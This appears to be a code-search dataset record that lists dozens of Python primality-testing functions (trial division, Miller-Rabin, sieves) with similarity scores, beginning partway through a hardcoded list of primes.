5807, 5813, 5821, 5827, 5839, 5843, 5849, 5851, 5857, 5861, 5867, 5869, 5879, 5881, 5897, 5903, 5923,\n 5927, 5939, 5953, 5981, 5987, 6007, 6011, 6029, 6037, 6043, 6047, 6053, 6067, 6073, 6079, 6089, 6091,\n 6101, 6113, 6121, 6131, 6133, 6143, 6151, 6163, 6173, 6197, 6199, 6203, 6211, 6217, 6221, 6229, 6247,\n 6257, 6263, 6269, 6271, 6277, 6287, 6299, 6301, 6311, 6317, 6323, 6329, 6337, 6343, 6353, 6359, 6361,\n 6367, 6373, 6379, 6389, 6397, 6421, 6427, 6449, 6451, 6469, 6473, 6481, 6491, 6521, 6529, 6547, 6551,\n 6553, 6563, 6569, 6571, 6577, 6581, 6599, 6607, 6619, 6637, 6653, 6659, 6661, 6673, 6679, 6689, 6691,\n 6701, 6703, 6709, 6719, 6733, 6737, 6761, 6763, 6779, 6781, 6791, 6793, 6803, 6823, 6827, 6829, 6833,\n 6841, 6857, 6863, 6869, 6871, 6883, 6899, 6907, 6911, 6917, 6947, 6949, 6959, 6961, 6967, 6971, 6977,\n 6983, 6991, 6997, 7001, 7013, 7019, 7027, 7039, 7043, 7057, 7069, 7079, 7103, 7109, 7121, 7127, 7129,\n 7151, 7159, 7177, 7187, 7193, 7207, 7211, 7213, 7219, 7229, 7237, 7243, 7247, 7253, 7283, 7297, 7307,\n 7309, 7321, 7331, 7333, 7349, 7351, 7369, 7393, 7411, 7417, 7433, 7451, 7457, 7459, 7477, 7481, 7487,\n 7489, 7499, 7507, 7517, 7523, 7529, 7537, 7541, 7547, 7549, 7559, 7561, 7573, 7577, 7583, 7589, 7591,\n 7603, 7607, 7621, 7639, 7643, 7649, 7669, 7673, 7681, 7687, 7691, 7699, 7703, 7717, 7723, 7727, 7741,\n 7753, 7757, 7759, 7789, 7793, 7817, 7823, 7829, 7841, 7853, 7867, 7873, 7877, 7879, 7883, 7901, 7907,\n 7919, 7927, 7933, 7937, 7949, 7951, 7963, 7993, 8009, 8011, 8017, 8039, 8053, 8059, 8069, 8081, 8087,\n 8089, 8093, 8101, 8111, 8117, 8123, 8147, 8161, 8167, 8171, 8179, 8191, 8209, 8219, 8221, 8231, 8233,\n 8237, 8243, 8263, 8269, 8273, 8287, 8291, 8293, 8297, 8311, 8317, 8329, 8353, 8363, 8369, 8377, 8387,\n 8389, 8419, 8423, 8429, 8431, 8443, 8447, 8461, 8467, 8501, 8513, 8521, 8527, 8537, 8539, 8543, 8563,\n 8573, 8581, 8597, 8599, 8609, 8623, 8627, 8629, 8641, 8647, 8663, 8669, 8677, 8681, 8689, 8693, 8699,\n 8707, 8713, 8719, 8731, 8737, 8741, 8747, 8753, 8761, 8779, 8783, 8803, 8807, 8819, 8821, 8831, 8837,\n 8839, 8849, 8861, 8863, 8867, 8887, 8893, 8923, 8929, 8933, 8941, 8951, 8963, 8969, 8971, 8999, 9001,\n 9007, 9011, 9013, 9029, 9041, 9043, 9049, 9059, 9067, 9091, 9103, 9109, 9127, 9133, 9137, 9151, 9157,\n 9161, 9173, 9181, 9187, 9199, 9203, 9209, 9221, 9227, 9239, 9241, 9257, 9277, 9281, 9283, 9293, 9311,\n 9319, 9323, 9337, 9341, 9343, 9349, 9371, 9377, 9391, 9397, 9403, 9413, 9419, 9421, 9431, 9433, 9437,\n 9439, 9461, 9463, 9467, 9473, 9479, 9491, 9497, 9511, 9521, 9533, 9539, 9547, 9551, 9587, 9601, 9613,\n 9619, 9623, 9629, 9631, 9643, 9649, 9661, 9677, 9679, 9689, 9697, 9719, 9721, 9733, 9739, 9743, 9749,\n 9767, 9769, 9781, 9787, 9791, 9803, 9811, 9817, 9829, 9833, 9839, 9851, 9857, 9859, 9871, 9883, 9887,\n 9901, 9907, 9923, 9929, 9931, 9941, 9949, 9967, 9973]:\n if _n % p == 0:\n return _n == p\n if _n < 1E8: # Limit 1E8, because we have all primes below 1E4\n return True\n else:\n return None", "def is_prime(number):\n if number <=3:\n return True\n \n for i in range(2, number):\n if number % i == 0:\n return False\n \n return True", "def is_prime(n):\n assert n > 3\n k = int(log2(n))\n m = n - 1\n d = 0\n while(m % 2 == 0):\n m //= 2\n d += 1\n for _ in range(k):\n a = randint(2, n - 2)\n x = pow(a, m, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(d - 1):\n x = pow(x, 2, n)\n if x == 1:\n return 0\n if x == n - 1:\n break\n if x != n - 1:\n return 0\n return 1", "def is_prime(n):\n \n for i in range(3, int(n**0.5+1), 2):\n 
if n % i == 0:\n print(n,'is not prime')\n return False\n\n print(n,'is prime') \n return True", "def isPrime(n):\n for i in range (2, n/2+1):\n if n % i == 0:\n return False\n return True", "def _is_prime(self, num):\n if num == 2:\n return True\n if num < 2 or num % 2 == 0:\n return False\n for n in range(3, int(num ** 0.5) + 2, 2):\n if num % n == 0:\n return False\n return True", "def is_prime(n):\n\t\n\tif n < 2:\n\t\treturn False\n\t\n\tif not n % 2:\n\t\treturn False\n\t\n\tfor possible_factor in range(3, int(sqrt(n)) + 1, 2):\n\t\tif not n % possible_factor:\n\t\t\treturn False\n\treturn True", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n divisors[n] = n // 2\n return False\n if n % 3 == 0:\n divisors[n] = 3\n return False\n\n if n in primes:\n return primes[n]\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n divisors[n] = n // i\n primes[n] = False\n return False\n i += w\n w = 6 - w\n\n primes[n] = True\n return True", "def primes(n):\n sqrtN=n**0.5\n odds=[2]\n odds+=[i for i in range(3,n) if i%2>0]\n\n for i in odds:\n if i!=0 and i<=sqrtN:\n for j in odds[odds.index(i)+1:]:\n if j%i==0:\n odds[odds.index(j)]=0\n return [i for i in odds if i!=0]", "def prime_factor(n):\n while n > 1:\n k = 2 \n while n % k != 0:\n k = k+1\n n = n // k\n print(k)", "def is_prime(n):\n for k in range(2, (n // 2) + 1):\n if n % k == 0:\n return False\n\n return True", "def is_prime(n):\r\n if n in (2, 3, 5, 7, 11, 13, 17, 19): return(True)\r\n if (n<=1 or n%2==0 or n%3==0): return(False)\r\n # determine upper limit of test range =>\r\n ulimit = (int(math.ceil(math.sqrt(n)))+1)\r\n return(not any(n%k==0 for k in range(3, ulimit, 2)))", "def getPrime(bits):\n\twhile(True) :\n\t\t# on continue a tirer des nombres tant que l'on n'a pas trouve de nombre premier\n\t\tp = getrandbits(bits)\n\t\tif(miller_rabin(p,100)) :\n\t\t\treturn p", "def isPrime(n, primes):\n\n k = math.log(n, 2) # number of bits in n\n r = getRounds(k)\n\n return checks(n, primes, r) # run checks", "def is_prime(n):\n x = 2\n def divide_x(x):\n if x > round(pow(n, 0.5)):\n return True\n elif n % x == 0:\n return False\n else:\n return divide_x(x + 1)\n return divide_x(x)", "def is_prime(num):\n\n if num == 2:\n return True\n for i in range(2, num):\n if num % i == 0:\n return False\n return True", "def isPrime(n: int) -> bool:\n if n == 1:\n return False\n # handle boundary conditions\n if n == 2 or n == 3:\n return True\n # Now check for divisibility of n by 2 & 3\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n i = 5\n while (i * i <= n):\n if n % i == 0 or n % (i + 2) == 0:\n return False\n\n i = i + 6\n return True", "def is_prime(n):\n if n <= 1:\n return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n assert n >= 1, \"n is not a positive integer\"\n k = 2\n if n == 1:\n flag = False\n else:\n flag = True\n while k <= sqrt(n):\n if n % k == 0:\n flag = False\n break\n k += 1\n return flag", "def primi(n):\n numVec = []\n for x in range(n-1):\n numVec.append(x+2)\n for num in numVec[:(n//2-1)]:\n if numVec[num-2] != 0:\n numVec[slice(2*num-2, n-1, num)] = [0]*(n//num-1)\n numVec = [x for x in numVec if x!=0]\n return numVec", "def isPrime(num):\r\n if num < 1:\r\n return False\r\n elif num == 2:\r\n return True\r\n else:\r\n for i in range(2, num):\r\n if num % i == 0:\r\n return False\r\n return True", "def is_prime(n):\n if n < 2 or n - round(n) != 0:\n print('Numbers smaller than 2 and non-integers are never prime.')\n 
return False\n if n == 2:\n return True\n if n % 2 == 0:\n return False\n for i in range(3, int(sqrt(n)+2), 2):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n i, count = 2, 0\n while i < n:\n if n % i == 0:\n count += 1\n break\n i += 1\n if count == 0 and n != 1:\n return True\n else:\n return False", "def is_prime(number: int):\n\n for index in range(2, (number//2) + 1):\n if number%index == 0:\n return False\n return True", "def prime(n):\n # Case 0: n is 0, 1 or negative\n if n < 2:\n return False\n\n # Case 1: n = 2\n elif n == 2:\n return True\n\n # Case 2: n is even\n elif n % 2 == 0:\n return False\n\n # Case 3: n is odd\n for i in range(3, ceil(sqrt(n))+1, 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(num):\n\tif num is 1:\n\t\treturn False\n\tif num % 2 is 0:\n\t\treturn num is 2\n\n\tdivision = 3\n\twhile (division * division) <= num:\n\t\tif num % division is 0:\n\t\t\treturn False\n\t\tdivision += 2\n\treturn True", "def is_prime(num):\n for n in range(2, num):\n if num % n == 0:\n return False\n\n else:\n return True", "def equivalence(self, n):\n return n % self.prime", "def is_prime(number):\n number = int(number)\n\n if number < 2:\n return False\n if number < 4:\n return True\n if number % 2 == 0:\n return False\n for d in range(3, number // 2, 2):\n if number % d == 0:\n return False\n return True", "def isprime(n: int) -> bool:\r\n if n > 1:\r\n for i in range(2, int(n / 2) + 1):\r\n if (n % i) == 0:\r\n return False\r\n else:\r\n return True\r\n\r\n else:\r\n return False", "def is_prime(n: int) -> bool:\n if n <= 1:\n return False\n\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n \n if n < 2:\n return False\n elif n == 2 or n == 3 or n == 5:\n return True\n elif n % 2 == 0 or n % 3 == 0 or n % 5 == 0:\n return False\n \n i = 6\n sqrt_n = int(math.ceil(math.sqrt(n)))\n \n while i <= sqrt_n + 1:\n if n % (i - 1) == 0 or n % (i + 1) == 0:\n return False\n i += 6\n return True", "def prime(n):\n \n flag = 1 # this will be 0 --> if no prime \n for i in range(2, n):\n if (n%i == 0):\n flag = 0\n break #Most important to break once number is decided as not prime; even once divisible, no need to check further for that number \n else :\n flag = 1\n \n return flag", "def is_prime(num):\n if num < 2:\n return False\n\n for i in range(2, num):\n if num % i == 0:\n return True", "def is_prime(num):\n if num < 2:\n return False\n elif num == 2:\n return True\n\n for i in range(2, int(num**(1/2))+1):\n if num % i == 0:\n return False\n\n return True", "def isprime(n):\n\n if n % 2 == 0:\n return False\n\n # else take square root and iterate over all uneven (step 2) numbers\n sqrt_n = int(math.floor(math.sqrt(n)))\n for i in range(3, sqrt_n + 1, 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(n):\n if n == 2 or n == 3: return True\n if n < 2 or n % 2 == 0: return False\n if n < 9: return True\n if n % 3 == 0: return False\n r = int(sqrt(n))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f + 2) == 0: return False\n f += 6\n return True", "def is_prime(n):\n\n def mr(n, _known_primes=[2, 3], _precision_for_huge_n=16, ):\n\n def _try_composite(a, d, n, s):\n if pow(a, d, n) == 1:\n return False\n for i in range(s):\n if pow(a, 2**i * d, n) == n-1:\n return False\n return True # n is definitely composite\n\n if n in _known_primes:\n return True\n if n in (0, 1):\n return False\n if any((n % p) == 0 for p in _known_primes):\n return False\n d, s = n - 
1, 0\n while not d % 2:\n d, s = d >> 1, s + 1\n\n # Returns exact according to http://primes.utm.edu/prove/prove2_3.html\n if n < 1373653:\n return not any(_try_composite(a, d, n, s) for a in (2, 3))\n if n < 25326001:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))\n if n < 118670087467:\n if n == 3215031751:\n return False\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))\n if n < 2152302898747:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))\n if n < 3474749660383:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))\n if n < 341550071728321:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))\n # otherwise\n return not any(_try_composite(a, d, n, s)\n for a in _known_primes[:_precision_for_huge_n])\n\n def trial_division(n):\n if n < 2:\n return False\n if n < 4:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n limit = int(math.sqrt(n))\n divisor = 5\n\n while divisor <= limit:\n if n % divisor == 0 or n % (divisor + 2) == 0:\n return False\n divisor += 6\n\n return True\n\n if 30000000 < n < 341550071728321:\n return mr(n)\n else:\n return trial_division(n)", "def isPrime(n):\n if n == 1:\n return False\n elif n < 4:\n return True\n elif n % 2 == 0:\n return False\n elif n < 9:\n return True\n elif n % 3 == 0:\n return False\n else:\n r = int(floor(sqrt(n)))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f+2) == 0: return False\n f += 6\n return True", "def prime_checker(num):\n\n assert num > 0\n\n if num < 2:\n return False\n\n if num == 2:\n return True\n\n if num % 2 == 0:\n return False\n\n n = 3\n\n while n * n <= num:\n\n if num % n == 0:\n return False\n\n else:\n num += 2\n\n return True", "def is_prime(num):\n if is_even(num) and num != 2 or num == 1:\n return False\n\n for dd in range(3, int(mt.sqrt(num)) + 1):\n if num % dd == 0:\n return False\n\n return True", "def is_prime_by_python(num):\n if num == 2:\n return True\n elif num % 2 == 0 or num <= 1:\n # even or smaller then one\n return False\n else:\n res = True\n partial_num_range = int(num / 4) + 1\n\n for i in range(1, partial_num_range):\n if num % (2 * i + 1) == 0:\n res = False\n break\n return res", "def is_prime(num: int) -> bool:\n return factorial(num - 1) % num != 0", "def is_prime(number):\n #for i in range(2, ceil(sqrt(number))):\n for i in range(2, number):\n if number % i == 0:\n return False\n return True", "def is_prime(num):\n for x in range(2, num + 1):\n if num % x == 0:\n return False\n return True", "def is_prime(n):\n\tb = 2\n\twhile b <= math.sqrt(n):\n\t\tif n % b == 0:\n\t\t\treturn False\n\t\tb += 1\n\treturn True", "def prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def primes_less(n):\n test_nums = list(range(3, int(floor(sqrt(n))), 2))\n prime_flags = [True] * ((n - 2) // 2)\n for a in test_nums:\n next_div = a**2\n while next_div < n:\n prime_flags[(next_div-3)//2] = False\n next_div += 2*a\n return [2] + [2*i + 3 for i, flag in enumerate(prime_flags) if flag]", "def is_prime_number(number_):\n flag = 0\n for values in range(2, number_//2):\n if number_ % values == 0:\n flag += 1\n if flag == 1:\n return True\n else:\n return False" ]
[ "0.7530166", "0.7529172", "0.74141574", "0.7411982", "0.74033934", "0.7400811", "0.73903537", "0.7340318", "0.7339235", "0.7208471", "0.72076946", "0.71999794", "0.71911615", "0.7184746", "0.7175246", "0.71705663", "0.7161727", "0.71484905", "0.714309", "0.7138867", "0.7132576", "0.7129523", "0.71263534", "0.71098995", "0.7102168", "0.7086541", "0.7085513", "0.70756024", "0.7065586", "0.70587444", "0.70583105", "0.7057649", "0.70485735", "0.70368147", "0.7027998", "0.7018291", "0.7017022", "0.7013822", "0.7011501", "0.7010394", "0.7008339", "0.7005505", "0.70054156", "0.70030916", "0.700149", "0.7001393", "0.6985533", "0.6985533", "0.6980595", "0.6965383", "0.6961769", "0.69615954", "0.69595736", "0.6952772", "0.6951281", "0.6945838", "0.6945572", "0.6935624", "0.69321316", "0.69278765", "0.6927555", "0.6919923", "0.6909959", "0.6908562", "0.6907119", "0.68926406", "0.6888096", "0.6886029", "0.6885846", "0.6879229", "0.6872747", "0.68700576", "0.68693453", "0.6867306", "0.68663704", "0.6863135", "0.6858584", "0.6852262", "0.68442523", "0.6842027", "0.6840461", "0.68315387", "0.6828364", "0.6825707", "0.6822819", "0.6820611", "0.6814864", "0.681463", "0.6806338", "0.6798312", "0.67857236", "0.6784974", "0.67826074", "0.6772027", "0.6768934", "0.6767242", "0.67667156", "0.67649543", "0.67579836", "0.6751628", "0.6746886" ]
0.0
-1
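
A quick illustration of the first_n_digits document above (illustrative calls, not dataset content; they assume the import math added to the snippet):

# Minimal sketch: leading-digit extraction via integer division.
print(first_n_digits(987654321, 3))   # -> 987  (int(log10(987654321)) == 8)
print(first_n_digits(42, 1))          # -> 4
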
Verifies that a positive integer is a square
def is_square(apositiveint):
    x = apositiveint // 2
    seen = set([x])
    while x * x != apositiveint:
        x = (x + (apositiveint // x)) // 2
        if x in seen:
            return False
        seen.add(x)
    return True
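# Illustrative usage, hand-traced: the loop is Newton's integer square-root
# step x <- (x + apositiveint // x) // 2; `seen` catches the repeating state
# the iteration settles into when the input is not a perfect square.
# is_square(16)  # True  (x: 8 -> 5 -> 4, and 4 * 4 == 16)
# is_square(17)  # False (x: 8 -> 5 -> 4 -> 4, repeat detected)
# Caveat: apositiveint == 1 starts at x == 0 and raises ZeroDivisionError.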
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def quadrant(xcoord, ycoord):\n\n xneg = bool(xcoord < 0)\n yneg = bool(ycoord < 0)\n if xneg is True:\n if yneg is False:\n return 2\n return 3\n if yneg is False:\n return 1\n return 4", "def _point_in_tri(self, pos, tri):\n signs = np.sign([np.cross(tri[np.mod(i + 1, 3)] - tri[i],\n pos - tri[i]) for i in range(3)])\n if np.all(signs[1:] == signs[0]):\n return True\n else:\n return False", "def quadrant(pAx, pAy, pBx, pBy):\n###############################################################################\n\n if (pBx>pAx and pBy>pAy):\n return 1\n elif (pBx<pAx and pBy>pAy):\n return 2\n elif (pBx<pAx and pBy<pAy):\n return 3\n elif (pBx>pAx and pBy<pAy):\n return 4\n else:\n return 0", "def quadrant(point_x, point_y):\n if point_x == 0 and point_y == 0:\n print \"O\n \"\n elif point_x == 0 and (point_y < 0 or point_y > 0):\n print \"Y\"\n elif point_y == 0 and (point_x < 0 or point_x > 0):\n print \"X\"\n elif point_x > 0 and point_y > 0:\n print \"Q1\"\n elif point_x < 0 and point_y > 0:\n print \"Q2\"\n elif point_x < 0 and point_y < 0:\n print \"Q3\"\n elif point_x > 0 and point_y < 0:\n print \"Q4\"", "def check_quadline(self, row: int, col: int, drow: int, dcol: int) -> bool:\n count = 1\n token = self.get_token(row, col)\n count_token = 1\n while self.check_bounds(row+drow, col+dcol) and count <= 3:\n if self.grid[row+drow][col+dcol] == token:\n row += drow\n col += dcol\n count_token += 1\n if count_token == 4:\n return True\n count += 1\n return False", "def test(p):\n while p.quadrant() != TOP_RIGHT_QUAD:\n if p.x < 0:\n p = p.reflect_y()\n else:\n p = p.reflect_x()\n return p", "def is_lower_triangular(self):\n self.check_square()\n\n for i in range(self.rows):\n for j in range(i+1, self.rows):\n if self[i, j] != 0:\n return False\n return True", "def _in_bounds(self, x, y):\r\n return 0 <= x < 8 and 0 <= y < 8", "def continuous(self, x, y, X, Y):\n hor = fabs(x - X) == SSIZE and y == Y\n ver = fabs(y - Y) == SSIZE and x == X\n return (hor and not ver) or (ver and not hor)", "def is_valid_cord(x, y, w, h):\n return x >=0 and x < w and y >= 0 and y < h;", "def is_triangle(x):\n solution = solve_quad(1, 1, -2*x)\n return max(solution) % 1 == 0", "def inside(self, p: PointType, q: PointType) -> bool:\n\n # XXX re-implement with ccw and a list of points instead of a pair\n\n i = min(p.x, q.x) < self.x < max(p.x, q.x)\n j = min(p.y, q.y) < self.y < max(p.y, q.y)\n\n return i and j", "def test_single_quadrant(self):", "def within(point: tuple, box: tuple) -> bool:\r\n \r\n return box[0] < point[0] < box[2] and box[1] < point[1] < box[3]", "def is_pentagonal(x):\n solution = solve_quad(3, -1, -2*x)\n return max(solution) % 1 == 0", "def coordinates_within_board(n: int, x: int, y: int) -> bool:\n\n return x < n and y < n and x >= 0 and y >= 0", "def check(self,a,x,y):\r\n return not self.exitsinrow(self.rows,x,a) and not self.existsincol(self.rows,y,a) and \\\r\n not self.exitsinblock(self.rows, x - x % 3, y - y % 3,a)", "def valid(a,b,x,y):\n\t# Size of the square grid that encases rectagle x,y\n\tsquare = x + y - 2\n\t# Taxi cab distance (no diagonals) from (p_a, p_b) to (a,b)\n\tsteps = lambda p_a, p_b: abs(p_a - a) + abs(p_b - b)\n\t# Top/Bottom/Left/Right bound\n\tif min(a,b) < 0 or max(a,b) >= square: return False\n\t# Upper left/Lower right corner check\n\tif steps(0,0) < (x - 2) or steps(square - 1, square - 1) < (x - 2): return False \n\t# Lower left/Upper right corner check\n\telif steps(square - 1, 0) < (y - 2) or steps( 0, square - 1) < (y - 2): return False\n\treturn 
True", "def inrange(cc, point):\n return point.row in range(cc.top, cc.bottom+1) and point.col in range(cc.left, cc.right+1)", "def check_infinite(coord, sides, coordinates):\n return is_border(coord, sides)\\\n and coord not in coordinates\\\n and (\\\n (coord[0]+1, coord[1]) not in coordinates and (coord[0]-1, coord[1]) not in coordinates\\\n or (coord[0], coord[1]+1) not in coordinates and (coord[0], coord[1]-1) not in coordinates)", "def isInside(x1, y1, x2, y2, x3, y3, x, y):\n # Calculate area of triangle ABC\n A = area (x1, y1, x2, y2, x3, y3)\n \n # Calculate area of triangle PBC\n A1 = area (x, y, x2, y2, x3, y3)\n \n # Calculate area of triangle PAC\n A2 = area (x1, y1, x, y, x3, y3)\n \n # Calculate area of triangle PAB\n A3 = area (x1, y1, x2, y2, x, y)\n \n # Check if sum of A1, A2 and A3\n # is same as A\n if(A == A1 + A2 + A3):\n return True\n else:\n return False", "def get_quadrant(x, y):\n try:\n x = int(x)\n y = int(y)\n except ValueError:\n return (0)\n\n if y >= 0 and x > 0:\n return (1)\n elif y >= 0 and x < 0:\n return (2)\n elif y < 0 and x < 0:\n return (3)\n else:\n return (4)", "def is_upper_triangular(self):\n self.check_square()\n\n for i in range(self.rows):\n for j in range(i):\n if self[i, j] != 0:\n return False\n return True", "def is_quadline(self, col: int) -> bool:\n row = self.depth(col)\n for i in range(-1, 2):\n for j in range(-1, 2):\n if not (i == 0 and j == 0) and self.check_quadline(row, col,\n i, j):\n return True\n return False", "def test_case_05_not_legal_triangle(self):\n self.__assert_equals_test_case([(4, 6, 11)], 'NotATriangle')", "def test_triangle_positive_is_equilateral_property(self):\n a = Point(-9, 10)\n b = Point(-1, 4)\n c = Point(3 * 3 ** 0.5 - 5, 4 * 3 ** 0.5 + 7)\n t = Triangle(a, b, c)\n self.assertTrue(t.is_equilateral,\n \"Test of Triangle(Point(-9, 10), Point(-1, 4), Point(3 * 3 ** 0.5 - 5, 4 * 3 ** 0.5 + 7))\\\n failed, returned value != True.\")\n a = Point(-9, 21)\n b = Point(-1, 4)\n c = Point(3 * 3 ** 0.5 - 5, 4 * 3 ** 0.5 + 7)\n t = Triangle(a, b, c)\n self.assertFalse(t.is_equilateral,\n \"Test of Triangle(Point(-9, 21), Point(-1, 4), Point(3 * 3 ** 0.5 - 5, 4 * 3 ** 0.5 + 7))\\\n failed, returned value != False.\")", "def test_case_04_legal_triangle(self):\n self.__assert_not_equal_test_case([(4, 4, 8), (4, 5, 8)], 'NotATriangle')", "def check_inside(self, pos):\n x,y = pos\n return x >= self.posx and x <= self.posx + self.sizex and y >= self.posy and y <= self.posy + self.sizey", "def dans_cercle(self, r, x, y):\r\n self.r_num(r)\r\n valid = (isinstance(x, int) or isinstance(x, float)) and \\\r\n (isinstance(y, int) or isinstance(y, float))\r\n if valid:\r\n if sqrt(x**2+y**2)<self.r:\r\n return True\r\n else:\r\n return False\r\n else:\r\n raise TypeError", "def in_square(self, point):\n size = self.size\n centre = self.centre\n # Find the upper and lower bounds for the square in-terms of x and y\n lower_x, upper_x = centre.x - size / 2, centre.x + size / 2\n lower_y, upper_y = centre.y - size / 2, centre.y + size / 2\n # Equals with lower bounds only\n return (lower_x <= point.x < upper_x) and (lower_y < point.y <= upper_y)", "def in_line(pi, pj, pk):\n # compute cross product\n dxc = pk.x - pi.x;\n dyc = pk.y - pi.y;\n\n dxl = pj.x - pi.x;\n dyl = pj.y - pi.y;\n\n cross = dxc * dyl - dyc * dxl;\n\n return True if cross == 0 else False", "def tnuc_region_in_exon(np, beg, end):\n\n if beg.tpos != 0: return False\n if end.tpos != 0: return False\n for i in range(beg.pos, end.pos-1):\n if abs(np[i] - np[i+1]) != 
1:\n return False\n return True", "def _inside(self, x, y):\n wx, wy, w, h = self._raw_graph_window_dim()\n if wx <= x < wx + w and wy <= y < wy + h:\n return True\n return False", "def _inside_isheating(ci, hi, co, ho) -> bool:\n return abs(298.15 - ci.T) - abs(hi.T - 298.15) > 0", "def near(self,x1,y1,x2,y2):\n if x1 - x2 >= -1 and x1 - x2 <= 1 and\\\n y1 - y2 >= -1 and y1 - y2 <= 1:\n return True\n else:\n return False", "def in_box(coords, box):\n if box[0][0] < coords[0] < box[1][0] and box[1][1] < coords[1] < box[0][1]:\n return True\n return False", "def is_in_field(self, x, y):\n return (self.origin_x <= x < self.width) and (self.origin_y <= y < self.height)", "def is_valid_index(x, y, l_matrix):\n return x < l_matrix and y < l_matrix and x > -1 and y > -1", "def in_box(coords, box):\n\tif box[0][0] < coords[0] < box[1][0] and box[1][1] < coords[1] < box[0][1]:\n\t\treturn True\n\treturn False", "def check_coord_in_range(self, x, y):\n return 0 <= x < self.cols and 0 <= y < self.lines", "def are_vertices_clockwise(self,line):\r\n \r\n import numpy as np\r\n \r\n signed_area = 0\r\n for idx in range(line.shape[0]):\r\n \r\n x1 = line[idx,0]\r\n y1 = line[idx,1]\r\n if idx == line.shape[0]-1:\r\n x2 = line[0,0]\r\n y2 = line[0,1]\r\n else:\r\n x2 = line[idx+1,0]\r\n y2 = line[idx+1,1]\r\n \r\n signed_area += (x1 * y2 - x2 * y1)\r\n \r\n return (np.sign(signed_area) == -1.)", "def are_vertices_clockwise(self,line):\r\n \r\n import numpy as np\r\n \r\n signed_area = 0\r\n for idx in range(line.shape[0]):\r\n \r\n x1 = line[idx,0]\r\n y1 = line[idx,1]\r\n if idx == line.shape[0]-1:\r\n x2 = line[0,0]\r\n y2 = line[0,1]\r\n else:\r\n x2 = line[idx+1,0]\r\n y2 = line[idx+1,1]\r\n \r\n signed_area += (x1 * y2 - x2 * y1)\r\n \r\n return (np.sign(signed_area) == -1.)", "def is_on_curve(self):\n if self.infinity:\n return True\n left = self.y * self.y\n right = self.x * self.x * self.x + self.ec.a * self.x + self.ec.b\n\n return left == right", "def checkintersection(p1,p2,p3,p4):\n def isonsegment(i,j,k):\n return ((i.x <= k.x or j.x <= k.x) and (k.x <= i.x or k.x <= j.x) and\n (i.y <= k.y or j.y <= k.y) and (k.y <= i.y or k.x <= j.y))\n\n def computedirection(i,j,k):\n a = (k.x - i.x) * (j.y - i.y);\n b = (j.x - i.x) * (k.y - i.y);\n if a < b:\n return -1\n elif a > b:\n return 1\n else:\n return 0\n\n # return no intersection if they\n if p1.x == p3.x and p1.y == p3.y:\n return False \n if p1.x == p4.x and p1.y == p4.y:\n return False\n if p2.x == p3.x and p2.y == p3.y:\n return False\n if p2.x == p4.x and p2.y == p4.y:\n return False\n\n\n d1 = computedirection(p3,p4,p1)\n d2 = computedirection(p3,p4,p2)\n d3 = computedirection(p1,p2,p3)\n d4 = computedirection(p1,p2,p4)\n return ((((d1 > 0 and d2 < 0) or (d1 < 0 and d2 > 0)) and\n ((d3 > 0 and d4 < 0) or (d3 < 0 and d4 > 0))) or\n (d1 == 0 and isonsegment(p3,p4,p1)) or\n (d2 == 0 and isonsegment(p3,p4,p2)) or\n (d3 == 0 and isonsegment(p1,p2,p3)) or\n (d4 == 0 and isonsegment(p1,p2,p4)))", "def isOnInteriorSide(self, v):\n n = self.normalVect()\n return n.dotProduct(vector(self.vertices[0]) - vector(v)) > 0", "def is_border(coord, sides):\n return coord[0] <= 0 or coord[0] >= sides[\"bottom\"]\\\n or coord[1] <= 0 or coord[1] >= sides[\"right\"]", "def isOutsideBorder(self):\n if (self.posX < -self.myGalaxy.worldWidth or self.posX > self.myGalaxy.worldWidth or\n self.posY < -self.myGalaxy.worldHeight or self.posY > self.myGalaxy.worldHeight):\n return 1\n return 0", "def is_inside(self, p):\n s, t = self.get_barycentric_coord(p)\n if 0 
<= s <= 1 and 0 <= t <= 1 and s + t <= 1:\n return True\n else:\n return False", "def in_bounds(self, x, y):\n return x >= 0 and x < 8 and y >= 0 and y < 8", "def issquare(self):\r\n if self.width == self.height:\r\n return True\r\n else:\r\n return False", "def contains_point(self, x, y):\r\n if self.m == None:\r\n if abs(x - self.start[0]) > 0.6:\r\n return False\r\n else:\r\n if (y >= self.start[1] and y <= self.end[1]) or \\\r\n (y <= self.start[1] and y >= self.end[1]):\r\n return True\r\n else:\r\n return False\r\n else: \r\n y0 = int(self.m * x + self.n)\r\n if abs(y - y0) > 0.6: \r\n return False \r\n else: \r\n if ((x >= self.start[0] and x <= self.end[0]) or \\\r\n (x <= self.start[0] and x >= self.end[0])) and \\\r\n ((y >= self.start[1] and y <= self.end[1]) or \\\r\n (y <= self.start[1] and y >= self.end[1])): \r\n return True\r\n else:\r\n return False", "def is_valid_position(self, x, y):\n if (x > self.n_cols-1 or y > self.n_rows-1) or (x < 0 or y < 0):\n return False\n\n elif self.grid[x][y] == 3:\n return False\n\n return True", "def isIn(self, coor, rec):\n x, y = coor[0], coor[1]\n top, bottom, left, right = rec[1][1], rec[0][1], rec[0][0], rec[1][0]\n # print(top, bottom, left, right)\n if left <= x <= right and bottom <= y <= top:\n return True\n else:\n return False", "def is_origin(self) -> bool:\n return self.x == 0 and self.y == 0", "def within(self, x, y):\n return x >= self.top_x and x <= self.bottom_x and y >= self.bottom_y and y 